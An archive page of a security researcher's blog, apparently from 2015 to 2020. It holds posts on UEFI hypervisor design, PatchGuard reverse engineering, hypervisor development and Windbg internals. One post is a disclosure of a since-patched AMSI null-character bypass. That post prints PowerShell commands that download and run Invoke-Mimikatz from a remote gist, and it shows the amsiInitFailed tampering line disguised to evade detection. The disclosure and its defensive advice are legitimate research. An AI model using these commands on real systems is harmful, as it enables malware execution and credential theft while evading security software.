Friday, March 13, 2020

Introduction and Notes on Design Considerations of UEFI-based Hypervisors

In this post, I am going to write up some of the lessons learned and the challenges I had to go through to write a UEFI-based hypervisor that supports booting Windows. I hope this post gives pointers to study and helps you get started with writing a similar hypervisor.
UEFI hypervisor brief design walk-through

Background


Lately, I spent some time to study EDK2-based UEFI programming and developed a hypervisor as a UEFI driver. It has been fun and turned out to be more straightforward than I initially imagined, but at the same time, there were some learning curves and technical challenges I had to take extra time to understand and overcome.

The major reason of taking extra time was lack of write ups or tutorials for my goal. Although there were few open-source projects and many documents and presentations I was able to study, those were not focused on UEFI programming with the context of writing hypervisors. This is entirely understandable as I do not suppose those are common subjects, and that was also why I wrote up this post.

In this post, I will start by giving a high-level overview of UEFI, and unique aspects in its execution environment, then look into challenges of writing a hypervisor as a UEFI driver.

UEFI Execution Environment


UEFI vs EDK2


UEFI is the specification of firmware to replace legacy-BIOS, where no standard exists, and offers a well-defined execution environment and programming interfaces. EDK2 is the open-source, reference implementation of the specification and provides tools to develop firmware modules.

Application vs Driver


Firmware modules can be built as part of a whole firmware image or as a standalone module (file) to be separately deployed. The latter is how I compiled the module. Additionally, UEFI modules can be written as an application which is unloaded from memory once its execution finishes, or as a driver which remains loaded unless explicitly unloaded. Obviously, the driver is the natural choice for the hypervisor, although I will mention the other common approach later.

Boot Time vs Run Time


The execution environment of drivers can be separated into two different phases: boot time and run time.

Frankly speaking, the boot time is before execution is handed over to the operating system and the run time is after that. This transition happens when a UEFI defined API called ExitBootServices is called. In the case of Windows startup, this is sometime before winload.efi transfers its execution to ntoskrnl.exe.

Most of the firmware drivers loaded on memory are unloaded at this point because most of them, for example, a network driver for PXE boot, are no longer needed once execution is handed over to the operating system. This type of driver is called boot drivers, and not suitable for the hypervisor that is meant to stay alive even after the operating system is fully started.

Runtime drivers, on the other side, are the type of driver that resides on memory throughout the system life span and suited for the hypervisor.

Boot-time Services vs Run-time Services


UEFI defines a collection of APIs, and their availability is impacted by the boot-to-run time transition. The type of API called boot-time services can no longer be used after the transition because drivers that implement the API are unloaded. After this transition, runtime drivers can only use the run-time services, which drastically reduces the ability of the hypervisor to interact with the environment.

Physical Mode vs Virtual Mode


Another transition that the runtime drivers have to go through is the change of the memory address layout.

At the boot time, the system is in the long-mode, same as Windows. However, virtual to physical address mapping is pure 1:1, that is, the virtual address 0xdf2000 is translated into the physical address 0xdf2000. This mode is called physical mode.

Soon after the transition to run time, a bootloader (winload.efi in the case of Windows) sets up and configures new page tables to map runtime drivers to the addresses that work well with the operating system (eg, the physical address 0xdf2000 may be mapped to 0xfffff803`1ce40000). Then, the bootloader calls the SetVirtualAddressMap run-time service letting runtime drivers perform their preparation, switches to the new page table and discards the old page table. After this point, the runtime drivers are mapped to only the new address, just like regular Windows drivers. This mode is called virtual mode. This transition can be catastrophic if the hypervisor depends on the physical mode page tables. We will review how it can be a problem.

Application Processor Start-Up


Another unique event that the UEFI hypervisor has to handle is processor initialization. Processors that are not selected as a bootstrap processor (BSP; the processor initialized first) are called application processors (APs) and are initialized after transitioning to the virtual mode. This is done by BSP signaling INIT and Startup-IPI (SIPI). When SIPI is signaled, APs start its execution on the real-mode and go through mode transition up to the long-mode (in the case of the 64bit operating systems). This requires some extra VM-exit handling that was not relevant for the blue pull style hypervisors.

Those unique aspects of the UEFI environment pose technical challenges and require different hypervisor design considerations.

Challenges, Solutions, and Considerations


Host CR3


As mentioned, the host CR3 becomes invalid if the value at the time of driver load is used because that would be physical mode page tables that get destroyed. The most straightforward solution for this is to set up our own page tables with the same translation as the existing one (ie, physical mode page tables) and use them for the host. This may sound complicated but is implemented with just 50 lines of C code in MiniVisor.

However, this results in having different address translations once the guest switches to the virtual mode and makes it significantly difficult for the host to interact with the guest. For example, host code cannot be debugged with tools like Windbg anymore because none of Windows code is mapped in a usable form while the host is running. If the hypervisor is going to need complex interaction with the guest virtual address, other approaches might make it simpler at the end. In a private build, I implemented a guest shell-code that runs in the same address space as the NT system process for interaction with the guest.
Injecting the guest agent that hooks Windows kernel API
It also makes it harder to access the guest virtual memory from the host for the same reason without implementing the guest-virtual-to-host-virtual mapping mechanism. MiniVisor implements this in MemoryAccess.c. This is essentially what every single hypervisor implements. 

Host IDT


For the same reason as the host CR3 is discarded, the host IDT becomes invalid if the value at the time of driver load is used. Although this does not cause an issue immediately because interrupt is disabled during execution of the host, any programming error causing exception will cause triple fault without running any diagnostics code. The solution is to create its own IDT for the host.

Having its own IDT, however, means NMI can no longer be delivered to the Windows kernel if that occurs during the execution of the host (reminder: NMI still occurs even if interrupts are disabled). MiniVisor discards NMI for simplicity but you should consider reinjecting it into the guest instead.

Host GDT


You may wonder about the GDT. Yes, the GDT also needs to be created, but also requires modification because firmware does not set up the task state segment that is required for VMX.

Logging


Console output API is the boot-time service that cannot be used after the transition to run time. Hence, console-based logging must be ceased after that point. This could be addressed in several ways, such as hooking into operating system logging API, but the simplest solution is to use serial output instead of console output. This has its limitations but requires almost zero extra code.

Another sensible option is to have ring buffer to store log entries, and later, let a client application to pull and print them out.

Testing Application Processors Startup


This requires the hypervisor to handle VM-exits as well as proper emulation of paging mode transitions that are not relevant for the blue pull-style hypervisors. Specifically, handling of INIT, SIPI and CR0.PG access are required.

For me, this was one of the most challenging parts of writing a hypervisor that supports booting an operating system, mostly due to lack of available virtualization solutions as a test environment and difference between them and the bare-metal environment (eg, TLB, MSR etc), requiring through testing with bare-metal.

My recommendation is to buy and set up a single-board computer with a serial port so you can at least do printf-debugging (or even better, Direct Connect Interface support). I might blog about selecting devices and setting them up.
Testing with a single-board computer

Driver vs Standalone File

Compiling the hypervisor as a runtime driver works as demonstrated in the project. However, the more common approach is to build the hypervisor as a separate file and a UEFI application loads it into memory and starts executing it. That is how VMware hypervisor as well as Hyper-V is implemented, as examples. The standalone hypervisor format is often ELF because of wider cross-platform compiler and debugging tool support. 

This approach has an advantage that the hypervisor code remains platform agnostic and re-usable; for example, one can write a small Windows driver as a hypervisor loader without mixing up platform dependent loader code and hypervisor code that should be platform independent. Then, the hypervisor module can remain portable.


MiniVisor did not take this approach just because of lack of structure started from experimentation. I plan to restructure the project in this way. 


Conclusion

We reviewed some uniqueness of the UEFI environment and how those impact design and implementation of hypervisors compared with those designed under the blue-pill model. We also looked at how MiniVisor was designed to work with those new factors and implied limitations.

While this short blog post may not be sufficient for some readers to have clear ideas of those challenges and explained solutions, I hope this post gives you some pointers to study the codebase of MiniVisor and help make sense of why things are written in different ways than the blue pill-style Windows hypervisor.

Further Learning

As a final note, if you are particularly curious about tooling hypervisor for research and/or just having a solid understanding of the underneath technologies and concepts, Bruce Dang and I plan to offer a 5 days class this October. This will let you write your hypervisor for both Windows and UEFI environments, develop "something useful" and play with them on physical and virtual machines to internalize technical details. 

Please sign up from this page or contact us if you are interested in.
https://gracefulbits.regfox.com/hypervisor-development-for-security-analysis

Friday, February 16, 2018

AMSI Bypass With a Null Character

In this blog post, I am going to look into a flaw I reported a few months ago and see how the flaw could have been exploited to execute malicious PowerShell scripts and commands while bypassing AMSI based detection. This issue has been fixed as defense-in-depth with the February Update.

What is AMSI

AMSI, Anti-malware Scan Interface, is a mechanism Windows 10+ provides security software vendors for developing software that subscribes certain events and detects malicious contents. AMSI issues several types of events, but the most commonly used one by the software vendors is arguably the events about execution of scripts, where software can receive contents of those scripts and commands about to be executed (I will refer to them as contents simply), then scan and block them. 

The below illustration is an overview of how this event is generated and notified to security software for scanning.


The red boxes are security software that subscribes the events from AMSI and are called AMSI providers. When supported script engines such as PowerShell (i.e., System.Management.Automation.dll) and Windows Script Host (e.g., JScript.dll) execute contents, they call one of the functions exported from amsi.dll with the contents to scan with AMSI providers.  

As illustrated above, AMSI providers rely on script engines to call the exported function and forward contents properly through amsi.dll; or, they would not receive contents and detect malicious strings.

The Bug

The bug fixed was System.Management.Automation.dll did not take account of that PowerShell contents could include null characters in them and called AmsiScanString, which treated a null character as the end of contents, to forward contents to AMSI providers. Here is the prototype of the API.
----
HRESULT WINAPI AmsiScanString(
  _In_     HAMSICONTEXT amsiContext,
  _In_     LPCWSTR      string,   // Will be terminated at the first null character
  _In_     LPCWSTR      contentName,
  _In_opt_ HAMSISESSION session,
  _Out_    AMSI_RESULT  *result
);
----

Because of this bug, amsi.dll could truncate contents (value of "string" above) at the first null character and then send to AMSI providers. This results in that AMSI providers not being able to scan all of the contents and detect malicious strings.

Exploitation

The basic idea for exploitation is to place a null character into PowerShell contents before malicious strings appear.

File Based Exploitation

As a basic exploitation scenario, let us assume we are trying to execute Invoke-Mimikatz like this and being detected.
----
> powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-DefaultMimikatz.ps1')"
----


This is because the contents being Invoke-Expression'd are visible to AMSI providers as shown in the below screenshot.

Such detection can be bypassed by placing a null character at the beginning of the file being Invoke-Expression'd.

----
> powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1')"
----
This successfully bypasses scan and detection by AMSI providers as seen below ("Get-ChildItem Function: | Select-String Invoke" is added for a demonstration purpose).


Command Line Based Exploitation

With the above successful bypass, you might try to execute loaded Invoke-Mimikatz like below, but find it gets detected due to an appearance of "Invoke-Mimikatz" in the command line.
----
powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1'); Invoke-Mimikatz -DumpCerts"
----

A naive approach with Invoke-Expression could bypass process command line based detection but not AMSI based one, as "Invoke-Mimikatz" will still be visible to AMSI providers. Here is such an unsuccessful attempt.
----
powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1'); IEX ('Invoke-'+'Mimikatz -DumpCerts')"
----

To bypass AMSI detection in this scenario, we can insert a null character into the command line with a bit of string manipulation.
----
powershell "IEX (New-Object Net.WebClient).DownloadString('https://gist.github.com/tandasat/4958959cdeb1d0ac6dd1c70654b11e83/raw/Invoke-BypassingMimikatz.ps1'); IEX ('if(0){{{0}}}' -f $(0 -as [char]) + 'Invoke-'+'Mimikatz -DumpCerts')"
----

The highlighted part prepends a null character that never gets executed to the original command line. A resulted string will look like this.
----
if (0) {<NULL>} the rest of commands
----

This can successfully prevent AMSI providers from receiving all of the contents and detecting "Invoke-Mimikatz."


Summary of Exploitation

For file contents, insert "#<NULL>" at the beginning of the file, and any places where additional scans with AMSI occur. To identify the latter places, some try-and-error will be needed. Using a debugger and logging invocation of AmsiScanString with the below command will be helpful.
----
bp amsi!AmsiScanString "du @rdx;g"
----

For command line contents, wrap them into Invoke-Expression and prepend "'if(0){{{0}}}' -f $(0 -as [char]) +". Here is another step-by-step example to bypass detection on "AmsiUtils" and "amsiInitFailed" in the below contents:
----
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
----

1. Wrap the original contents with Invoke-Expression.
----
IEX ('[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)')
----

2. Prepend the null character to bypass AMSI based detection.
----
IEX ('if(0){{{0}}}' -f $(0 -as [char]) + '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)')
----

3. Make any modification sufficient to bypass command line based detection.
----
IEX ('if(0){{{0}}}' -f $(0 -as [char]) + '[Ref].Assembly.GetType("System.Management.Automation.Amsi'+'Utils").GetField("amsi'+'InitFailed","NonPublic,Static").SetValue($null,$true)')
----

It is worth noting that this exploitation is usable even on the Constrained Language Mode and does not trigger any event logs, unlike the most of AMSI bypass techniques which use reflection.

Fix and Recommendation

The fix Microsoft made was to use AmsiScanBuffer instead of AmsiScanString in System.Management.Automation.dll. As shown below, this function accepts arbitrary byte sequence for contents.
----
HRESULT WINAPI AmsiScanBuffer(
  _In_     HAMSICONTEXT amsiContext,
  _In_     PVOID        buffer,  // Not terminated at the null character
  _In_     ULONG        length,
  _In_     LPCWSTR      contentName,
  _In_opt_ HAMSISESSION session,
  _Out_    AMSI_RESULT  *result
  );
----

This way, AMSI providers can receive and scan entire contents even if a null character appears in the middle.

In theory, no action other than applying the patch should be required. However, software vendors using AMSI to scan PowerShell contents should review whether it can handle null characters properly should they appear.

Additionally, security researchers and users of security software can test if their AMSI providers are vulnerable to the bypass technique and ask vendors to address issues if needed. Also, it might be worth monitoring any appearance of a null character in PowerShell contents to detect attempts to exploit this issue.

As for other script engines, PowerShell Core is also affected but does not have a patch as of this writing yet. Windows Script Host is not affected as its interpreter stops reading script contents at the first null character, unlike PowerShell.

Acknowledgement

Kudos to Alex Ionescu (@aionescu) for helping me report this issue, and Microsoft for fixing it.

Thursday, October 15, 2015

Some Tips to Analyze PatchGuard

I published a new tool called meow that disables PatchGuard on Windows 8.1 on-the-fly. Though qertmeow has some interesting technical details I could explain such as support of ARM (Windows RT) and detection of the end of a function for installing an epilogue hook, on this entry, I am going to explain some techniques that help researchers analyze PatchGuard on your own rather than how this specific exploitation works. 

Those techniques are worthwhile to share because, you have to be able to analyze it if you hope to do something with PatchGuard as it is a moving target, and meow is not going to work forever due to updates of implementation of PatchGuard, or meow may not be perfect even at the time of publication of this article.

Summary

As your regular reverse engineering work, you can analyze PatchGuard in both static and dynamic means, but there are some hurdles specific to PatchGuard analysis on both sides, for example:

  • PatchGuard related functions do not have descriptive names or do not have names at all unlike other functions in the kernel
  • Most of function calls in PatchGuard functions are indirect calls like C++ code
  • Kernel debugging is not an option in some situations
  • Code is copied into random locations and stored in an encrypted form, and you cannot easily spot where to monitor at the run-time

Those are significant difficulties you face at the initial stage of analysis, but also ones you can easily overcome if you know some tricks I describe here. The tricks are as follows:

  • Identifying PatchGuard functions
    • Locating an initialization function and checking cross-references
    • Naming functions in a consistent manner
    • Checking the existence of SEH
  • Analyzing 0x109 Crash Dump for Re-constructing the PatchGuard context
    • Dissecting bug check parameters
    • Applying the format of the context to IDA
  • Discovering Threads Executing PatchGuard Code
    • Finding system threads on memory 

let us through them one by one.

Identifying PatchGuard functions

Firstly, you can easily find an initialization function of PatchGuard by sorting a function list by length. The largest function in the ntoskrnl.exe is the initialization function executed at the time of system initialization and sets up a large structure so called the PatchGuard context(s) on non-pagable memory (I am going to describe the structure of the context later). I call this function as Pg_xInitializePatchGuard() in this article.
Image 1: The largest functions on x64 
Image 2: The largest functions on ARM

Secondly, you can identify other PatchGuard related functions with cross-referencing function calls. If a function is referenced from only other PatchGuard related functions, it is safe to assume that the function is PatchGuard dedicated and needs to be analyzed. As an example, let us take a look at a caller of Pg_xInitializePatchGuard(), KiFilterFiberContext(). You see that this function is referenced from Pg_xInitializePatchGuard() and another unnamed function sub_1407339C3() which is not called by anywhere. At this stage, it is safe to say that KiFilterFiberContext() and sub_1407339C3() are only used for PatchGuard.
Image 3: Callers of Pg_xInitializePatchGuard()

Image 4: Callers of  sub_1407339C3()


For ease of analysis with IDA, it is worth naming functions in a consistent manner since a number of functions to be analyzed is going to be large. I usually name PatchGuard functions with prefixes Pg_ or Pg_x for ones with symbols names and for ones without symbol names, respectively. In this case, I name KiFilterFiberContext() as Pg_KiFilterFiberContext(), and sub_1407339C3() as Pg_xKiFilterFiberContextCaller().
Image 5: Filtering functions with the prefix


You may also want to use parse_x64_SEH.py to discover code flow using SEH. With this script, you find that Pg_xKiFilterFiberContextCaller() is an __except expression and corresponding __try is in KeInitAmd64SpecificState(). By now, you may rename Pg_xKiFilterFiberContextCaller() as Pg_xKeInitAmd64SpecificStateExceptionHandler() and KeInitAmd64SpecificState() as Pg_KeInitAmd64SpecificState().
Image 6: Reflected SEH information

Image 7: Where the corresponding __try is


Similarly, you can repeat the same process against all functions and global variables referenced from each Pg_*() function using the Proximity browser of IDA. This gives you a fairly comprehensive list of Pg_ functions, which can be discouraging enough to most of casual reverse engineers ;)

Analyzing 0x109 Crash Dump for Re-constructing the PatchGuard Context

As soon as you start to read Pg_*() functions, you discover that there are countless of indirect calls with specific registers. Those are accesses to the PatchGuard context, and it is essential to know what are stored and how they are used to understand the internals of PatchGuard.
Image 8: References to the PatchGuard context
The most precise way to accomplish this is to read the initialization function (i.e., Pg_xInitializePatchGuard()) for function pointers and a main variation routine (i.e., Pg_FsRtlMdlReadCompleteDevEx()) for variables. Besides static analysis, it is also a wise idea to perform dynamic analysis to get a large view of it quickly, especially at the initial stage of analysis.

There are some difficulties to perform effective run-time analysis, however.

First of all, you do not know where to monitor at the beginning of analysis since most of core code are copied onto random memory locations and stored in an encoded form except for the time of execution. In addition to that, setting breakpoints or installing hooks onto the kernel causes bug check 0x109 unless you know how integrity check is carried out. Moreover, you may not able to attach a kernel debugger to the system running on some non-PC devices such as Windows RT and Windows Phone.

It may sounds pretty bad to us, but a good news is that we can still uncover the contents of the PatchGuard context with analyzing crash dump. Specifically, you can interpret each 'reserved' bug check parameter in the following ways on x64:

  • Arg1 - 0xA3A03F5891C8B4E8 = An address of the PatchGuard context
  • Arg2 - 0xB3B74BDEE4453415 = An address of a validation structure that detected corruption
  • Arg3 = An address of corrupted data (in most cases)

    NB: You can easily spot those magic values in Pg_FsRtlMdlReadCompleteDevEx() before a call to  Pg_SdbpCheckDll() as well as code setting bug check parameters.


Let us take a look at an example on Windows 10. This is what you get on bug check 0x109:
----
0: kd> !analyze -v
*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

CRITICAL_STRUCTURE_CORRUPTION (109)

...
Arguments:
Arg1: a3a01f597768b4f0, Reserved
Arg2: b3b72bdfc9e65cc3, Reserved
Arg3: fffff80100af8074, Failure type dependent information
Arg4: 0000000000000001, Type of corrupted region, can be
...
----
Then, check the first parameter:
----
kd> ? a3a01f597768b4f0 - 0xA3A03F5891C8B4E8
Evaluate expression: -35180519620600 = ffffe000`e5a00008
kd> dps ffffe000`e5a00008 l200
ffffe000`e5a00008  70047266`b0b8a753
...
ffffe000`e5a000e0  00000000`00000000
ffffe000`e5a000e8  fffff801`00453b80 nt!ExAcquireResourceSharedLite
ffffe000`e5a000f0  fffff801`004537f0 nt!ExAcquireResourceExclusiveLite
ffffe000`e5a000f8  fffff801`00688930 nt!ExAllocatePoolWithTag
ffffe000`e5a00100  fffff801`006896d0 nt!ExFreePool
...
ffffe000`e5a004b8  fffff801`00b850b0 nt!HandleTableListLock
ffffe000`e5a004c0  ffffc001`0c614000 nt!ObpKernelHandleTable
ffffe000`e5a004c8  fffff780`00000000 nt!KiUserSharedData
ffffe000`e5a004d0  ff73c402`76affdcd ; a copy of nt!KiWaitNever
ffffe000`e5a004d8  fffff801`00b292c0 nt!SeProtectedMapping
...
----
In this example, ffffe000`e5a00008 is an address of the PatchGuard context starting with random-looking bytes followed by a bunch of function pointers and variables. Although you may not tell what some variables are at a glance, defining the PatchGuard structure in IDA with this result is fundamental to uncover how PatchGuard works.
Image 9: Defining the structure in IDA

Image 10: Applied the structure definition

The second parameter is an address to the validation structure that detected corruption. There are multiple structures and each corresponds to a type of corrupted region (Arg4). Their formats vary but are mostly made up of at least: type of corrupted region, address(es) to verify, checksum(s) to be expected as valid value(s).

The following is dump of the structure in this example (I commented with some guesswork):
----
kd> ? b3b72bdfc9e65cc3 - 0xB3B74BDEE4453415 
Evaluate expression: -35180519544658 = ffffe000`e5a128ae
kd> dps ffffe000`e5a128ae
ffffe000`e5a128ae  00000000`00000001   ; type of corrupted region
ffffe000`e5a128b6  fffff801`00789000 nt!BcpCursor <PERF> (nt+0x36d000)
                                       ; an address of .pdata 
ffffe000`e5a128be  244e1425`0004a9e8   ; checksum?, a virtual size of .pdata
ffffe000`e5a128c6  fffff801`00789000 nt!BcpCursor <PERF> (nt+0x36d000)
                                       ; an address of .pdata 
ffffe000`e5a128ce  fffff801`0041c000 nt!WerLiveKernelInitSystem <PERF> (nt+0x0)
                                       ; an address of nt image base
ffffe000`e5a128d6  0004a9e8`00842000   ; a virtual size of .pdata, a size of nt image
ffffe000`e5a128de  39e90701`406ebd95   ; chehcksums?
ffffe000`e5a128e6  78ca89f0`62a1f735
...
----

Those structures are stored at the end of the PatchGuard context as a variable length of an array following other structures and code to recover corruption for reliable bug check and referenced using variable fields containing an offset and a number of arrays.

Discovering Threads Executing PatchGuard Code

another trick for run-time analysis is discovering threads running on memory and setting break points there. It is possible only when you are able to attach a kernel debugger to the system.

As I mentioned earlier, PatchGuard contexts including their code are allocated on memory, which is either on executable NonPagedPool or independent pages allocated by MmAllocateIndependentPages(), and it exhibits uncommon outputs in the thread stack trace.
----
kd> !process 4 
...
        THREAD ffffe00137df7040  Cid 0004.0064  Teb: ...
...
        Win32 Start Address nt!ExpWorkerThread (0xfffff803d16ac3f0)
...
        Child-SP          RetAddr           Call Site
        ffffd001`043ccdb0 fffff803`d1658ab9 nt!KiSwapContext+0x76
        ffffd001`043ccef0 fffff803`d1657fb8 nt!KiSwapThread+0x689
        ffffd001`043ccfb0 fffff803`d1621d0c nt!KiCommitThreadWait+0x148
        ffffd001`043cd040 ffffe001`37ede587 nt!KeDelayExecutionThread+0x1dc
        ffffd001`043cd0b0 4c91448e`dcd4c0fd 0xffffe001`37ede587
        ffffd001`043cd0b8 00000000`00000000 0x4c91448e`dcd4c0fd
...
----
From this output, you can see that the thread 0x64 is calling KeDelayExecutionThread() from somewhere outside images. Obviously, it is not common unless you have malware in your system, especially considering the fact that the thread is a worker thread and even not a dedicated thread.

Once you find a thread like this, you are free to set a break point at the return address and get control with the debugger.
----
kd> u 0xffffe001`37ede587
ffffe001`37ede587 jmp     ffffe001`37ede5b5
ffffe001`37ede589 lea     rax,[rbp+1A8h]
ffffe001`37ede590 xor     r9d,r9d
ffffe001`37ede593 xor     r8d,r8d
ffffe001`37ede596 mov     qword ptr [rsp+20h],rax
ffffe001`37ede59b mov     rcx,r13
ffffe001`37ede59e call    qword ptr [rbp+68h]
ffffe001`37ede5a1 test    eax,eax
kd> bp 0xffffe001`37ede587
----
Image 11: Woohoo! Enjoy debugging.
This trick does not always work because PatchGuard sometimes skips sleep functions (KeDelayExecutionThread() or KeWaitForSingleObject()) and you do not catch the moment when a thread is executing code on memory, or PatchGuard sometimes runs inside of ntoskrn.exe and not on pool. But it is worth trying some times of reboot and checking if those threads exist.

Note that if you want to read code around the return address with IDA, you can search the byte sequence at the return address with [Alt-B].
----
kd> db 0xffffe001`37ede587 l10
ffffe001`37ede587  eb 2c 48 8d 85 a8 01 00-00 45 33 c9 45 33 c0 48  .,H......E3.E3.H
----

Image 12: Finding where the PatchGuard context is running in IDA 

Another option is using a hypervisor to monitor and detect PatchGuard threads based on execution of some uncommon instructions if the system is running on the Intel platform. See my PoC Sushi as an example.

Conclusion

We have seen how to locate functions, how to read 109 bug check parameters and how to discover threads running PatchGuard code. That is pretty much everything you need to know to get started. By now, you are ready for analyzing PatchGuard on Windows 10 where no one has ever succeeded in exploitation (at the time I wrote this article). All you have to do is just read code, name fields and functions, and test if your analysis is correct. That would not be anything special to us.

Special Thanks

Thank you very much @Myriachan for providing me many details about Windows RT and an opportunity to work on this fun project.

Saturday, August 8, 2015

Writing a Hypervisor for Kernel Mode Code Analysis and Fun

In this entry, I am going to share some tips to develop your own hypervisors using VMware Workstation and briefly introduce a sample ring-1 monitoring tool based on a home made hypervisor. This entry may not be for you if you already have your own hypervisors you can update at your disposal or are not interested in development at all.  

Motivation

You know that hypervisors are helpful for dynamic analysis, and most of you use them in some forms. However, I guess not many of researchers have ever written by your self might be because it sounds challenging, while it can be quite handy and fun to have ring-1 monitoring tools you can update however you want. You may, for example, want to detect and monitor PatchGuard contexts a piece of kernel mode code that relocates itself onto a random memory location and performs some uncommon operations such as disabling write protection with modifying the CR0, clearing hardware breakpoints with resetting the DR7 and accessing IDTR using the SIDT and LIDT instructions. Without having hypervisors, you are not able to detect any of those operations as those are just instructions, and you do not know where to set breakpoints due to periodic relocation. But if you wish, do hypervisors help you accomplish it.

Now, you may wonder why you want to write your own hypervisors even though there are quite a few open source projects you could re-purpose. The reason is "it sounds better if you say that you wrote your own hypervisor from scratch." ;) Besides, reading full-fledged hypervisors may not be as enjoyable as writing your own code. Let us see how you can do it.

What You Need

You need VMware Workstation as a test environment. It supports nested virtualization (emulation of VT-x technology) and lets you debug your hypervisor code form the host Windows through Windbg in the exact same manner as regular kernel debugging.

You may also be able to use other VMware products that support nested virtualization like Fusion, but you will have to configure kernel debugging between two VMs, which is not the most straightforward way. Also, having Windows as a host lets you use VirtualKD which makes communication between a debugee and a debugger very fast. VirtualBox, unfortunately, does not support nested VM and allow to execute VMX operations in it. 

If you are paranoia and do not trust software emulated VT-x, you could use a real box with a serial port (which means it is not going to be a laptop) as a debugee. You might already know that kernel debugging through USB is possible. DO NOT GO THERE unless you already have hardware that was confirmed that it supports USB debugging. There are some subtle requirements which you will not tell if a debugee device suffices by just looking at the specs online. Besides that, being able to take snapshots and memory dump from a hanged machine using VMware drastically speeds up your development.
Image 1: USB2 debug-cable. Not recommended.

Configuring Virtual Machines

You have to make some changes in a debugee virtual machine. Firstly, you have to check the following options:
  • Virtualize Intel VT-x/EPT or AMD-V/RVI
  • Virtualize CPU performance counters
Image 2: Virtual Machine Config

Secondly, you should add those lines in a corresponding VMX file [1], otherwise you will end up with getting mysterious, random-looking NMI_HARDWARE_FAILURE bug check.
----
hypervisor.cpuid.v0 = "FALSE"
mce.enable = "TRUE"
vhu.enable = "TRUE" 
----

EDIT (Nov 1, 2015): Removed entries with apic.xapic since I confirmed that it still worked without them.

Gotchas

Once you have configured the VM, the rest is only a matter of programming, but there are some gotchas I would like to share to keep you sane:
  • Try to avoid use of APIs inside a VMExit handler (in VMX root mode). Since the handler can be executed from any contexts including exception handlers or code under a very high IRQL, it is tough to conclude that calling an API which you do not know *exactly* what it does is 100% safe. 
  • For the same reason, avoid calling DbgPrint() from the VMExit handler. It usually works fine but sometimes causes mysterious errors like triple fault when you request a lot of log. Instead, store log texts into pre-allocated non-paged pool and print them out later from a safe context. 
  • Do not step-in to vmlaunch and vmresume instructions. The debugger will never return control to you, and the debugee will hang. 
  • Do not put software breakpoints everywhere in the VMExit handler. Although it seems to be fine in most cases, in some situation, the debugger does not get control from the debugee, and the system just freezes when int 3 is executed.  

Getting Memory Dump From a Hanged Debugee System

One of the biggest advantages of using VMware is that you can take memory dump (.dmp files) from a hanged debugee and give it to Windbg just like normal crash dump analysis. 

To take a dump file, first you suspend the virtual machine when it is freezed and take a snapshot.
Image 3: Suspend a hanged virtual machine

Then, navigate to where snapshot files are stored and run the vmss2core command under the VMware Workstation directory with names of the latest vmsn and vmem files. For instance, commands look like this:
----
> cd "C:\Users\user\Documents\Virtual Machines\Windows 8 x64"

> "C:\Program Files (x86)\VMware\VMware Workstation\vmss2core-win.exe" -W8 "Windows 8 x64-Snapshot45.vmsn" "Windows 8 x64-Snapshot45.vmem"

vmss2core version 2452889 Copyright (C) 1998-2015 VMware, Inc. All rights reserved.
scanning pa=0 len=0x10000000
Cannot translate linear address 7ff7d12b1b00.
Cannot read context LA from PRCB.
...
... 2020 MBs written.
... 2030 MBs written.
... 2040 MBs written.
Finished writing core.
----
Note that vmss2core comes with VMware Workstation by default (version 2780323) does not seem to be functioning (always generates 0 byte of empty files). If that the case for you too, download version 2452889 from VMware's website.

Now, you have gotten the memory.dmp and can give it to the debugger.
----
> windbg -z memory.dmp
----
Image 4: Memory dump analysis



References

There are some open source hypervisor projects you can refer to for implementation. Those are small enough to read quickly and written for Windows hosts.

A Sample Monitoring Tool Based on a Hypervisor

With those tips, you should be able to develop your own hypervisor fairly smoothly and utilize it for your research. I, for example, wrote a proof-of-concept hypervisor, Sushi, monitoring use of some uncommon instructions from non-image kernel space and stopping a thread when write protection in CR0 is modified.
Image 5: Demo hypervisor "Sushi" detecting interesting stuff

This is less than 4000 lines of code yet gives me an ability to investigate some run-time behaviour of the kernel I was unable to monitor. It is pretty awesome, and above all, playing with low-level stuff like this is quite fun.

In short, if you are interested in developing hypervisors for whatever reasons, you can do it without buying any extra hardware, and then, you can also make it one of your analysis tools like this demo hypervisor.

Thanks

Thank you @brucedang for letting me know that nested virtualization of VMware is reliable enough to write and test hypervisors.

Sunday, June 7, 2015

Reverse Engineering Windbg Commands for Profit

In this article, I will introduce benefit of reverse engineering Windbg for understanding the Windows kernel with looking at an undocumented command, fixing an issue in it and re-implementing the same functionality on a device driver.


Windbg is a powerful resource not only because you can see thorough run-time information even if you do not know how to manually do that but also you can learn how Windbg does that with reverse engineering it. Implementation of the !timer command is, for example, where you should examine if you want to know how to enumerate all scheduled timer callbacks.

But, what if you cannot find the command that works with internals you are interested in? In my case, I was looking for a way to list items inserted into the work queues with ExQueueWorkItem(), and documents of Windbg did not tell what command I could use.

Finding an Undocumented Command

There are many undocumented commands in Windbg. By using strings.exe against DLL files under the Windbg folder, you will get hints about them and/or where to look at. Here is a result of search for "workqueue":

Debuggers\x64>strings -n 5 -s *.dll | findstr /i workqueue
...
Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i RealTime WorkQueue
Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i HyperCritical WorkQueue
Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i SuperCritical WorkQueue
Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i Critical WorkQueue
Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i Delayed WorkQueue
Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i Normal WorkQueue
